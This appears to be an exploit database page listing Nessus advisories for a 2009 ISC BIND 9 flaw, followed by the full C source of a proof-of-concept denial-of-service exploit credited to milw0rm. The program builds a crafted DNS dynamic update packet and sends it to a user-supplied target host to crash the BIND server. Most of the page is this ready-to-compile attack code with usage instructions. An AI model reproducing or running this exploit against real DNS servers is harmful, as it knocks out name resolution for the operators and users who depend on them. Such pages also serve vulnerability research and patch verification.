ISC BIND 9 Remote Dynamic Update Message Denial of Servic
Reporter | Title | Published | Views | Family All 199 |
---|---|---|---|---|
Tenable Nessus | AIX 5.3 TL 9 : bind (IZ56313) | 24 Jan 201300:00 | β | nessus |
Tenable Nessus | ISC BIND Dynamic Update Message Handling Remote DoS | 29 Jul 200900:00 | β | nessus |
Tenable Nessus | FreeBSD : BIND -- Dynamic update message remote DoS (83725c91-7c7e-11de-9672-00e0815b8da8) | 3 Aug 200900:00 | β | nessus |
Tenable Nessus | RHEL 4 : bind (RHSA-2009:1180) | 30 Jul 200900:00 | β | nessus |
Tenable Nessus | Mandriva Linux Security Advisory : bind (MDVSA-2009:181) | 30 Jul 200900:00 | β | nessus |
Tenable Nessus | Oracle Linux 5 : bind (ELSA-2009-1179) | 12 Jul 201300:00 | β | nessus |
Tenable Nessus | Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 8.1 / 9.0 / 9.1 / current : bind (SSA:2009-210-01) | 28 May 201100:00 | β | nessus |
Tenable Nessus | CentOS 5 : bind (CESA-2009:1179) | 6 Jan 201000:00 | β | nessus |
Tenable Nessus | openSUSE 10 Security Update : bind (bind-6383) | 6 Oct 200900:00 | β | nessus |
Tenable Nessus | CentOS 3 : bind (CESA-2009:1181) | 30 Jul 200900:00 | β | nessus |
/*
ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
"Based on:
http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt
by kingcope - this is basically a rewrite of the above, lame i know, but fun enough
for the [zone] argument you can try what is in the named.conf with "type master"
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define PORT 31337
struct dnspkt1 {
unsigned short transact;
unsigned short flags;
unsigned short zones;
unsigned short pr;
unsigned short updates;
unsigned short rrs;
};
struct dnspkt2 {
unsigned short type;
unsigned short class;
unsigned short name2;
unsigned short type2;
unsigned short class2;
unsigned short ttl1;
unsigned short ttl2;
unsigned short datalen;
unsigned short name3;
unsigned short type3;
unsigned short class3;
unsigned short ttl3;
unsigned short ttl4;
unsigned short datalen2;
};
int packdomain(char * dest, const char *src)
{
int i,n,cnt;
n=strlen(src);
dest[n+1]=0; // terminator
cnt=0;
for (i=n; i>0; i--)
{
if (src[i-1]=='.')
{
dest[i]=cnt;
cnt=0;
}
else
{
dest[i]=src[i-1];
cnt++;
}
}
dest[0]=cnt;
return n+2;
}
int main(int argc, char **argv) {
int sockfd, clilen;
struct sockaddr_in serv_addr, cli_addr;
struct dnspkt1 d1;
struct dnspkt2 d2;
printf("ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\n");
printf("Based on:\n");
printf("http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\n");
printf("by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\n");
if (argc < 2) {
printf("usage: %s <host> [zone]\n", argv[0]);
return 0;
}
sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sockfd < 0) {
printf("error on socket() call");
return -1;
}
memset(&serv_addr, '\0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = INADDR_ANY;
serv_addr.sin_port = htons(PORT);
if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
printf("error binding socket\n");
return -1;
}
memset(&cli_addr, '\0', sizeof(cli_addr));
cli_addr.sin_family = AF_INET;
cli_addr.sin_addr.s_addr = inet_addr(argv[1]);
cli_addr.sin_port = htons(53);
memset(&d1, '\0', sizeof(d1));
memset(&d2, '\0', sizeof(d2));
d1.transact = htons(0x1cd6);
d1.flags = htons(0x2800);
d1.zones = htons(0x0001);
d1.pr = htons(0x0001);
d1.updates = htons(0x0001);
d1.rrs = 0;
char *name = (char*)malloc(8096);
char nam[1024];
if (argc < 3) {
/* Not sure if this is right to set as default, have no clue about dns proto
It works for me.. */
strcpy(nam, "127.in-addr.arpa");
} else {
strncpy(nam, argv[2], sizeof(nam));
nam[sizeof(nam)-1]=0;
}
int n=packdomain(name, (char*)nam);
d2.type = htons(0x0006);
d2.class = htons(0x0001);
d2.name2 = htons(0xc00c);
d2.type2 = htons(0x00ff);
d2.class2 = htons(0x0001);
d2.datalen = 0;
d2.name3 = htons(0xc00c);
d2.type3 = htons(0x00ff);
d2.class3 = htons(0x00ff);
d2.ttl1 = 0;
d2.ttl2 = 0;
d2.ttl3 = 0;
d2.ttl4 = 0;
d2.datalen2 = 0;
char buffer[10000];
memcpy(buffer, &d1, sizeof(d1));
memcpy(buffer+sizeof(d1), name, n);
memcpy(buffer+sizeof(d1)+n, &d2, sizeof(d2));
clilen=sizeof(cli_addr);
sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&cli_addr, sizeof(cli_addr));
printf("aight!\n");
return 0;
}
// milw0rm.com [2009-07-30]
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo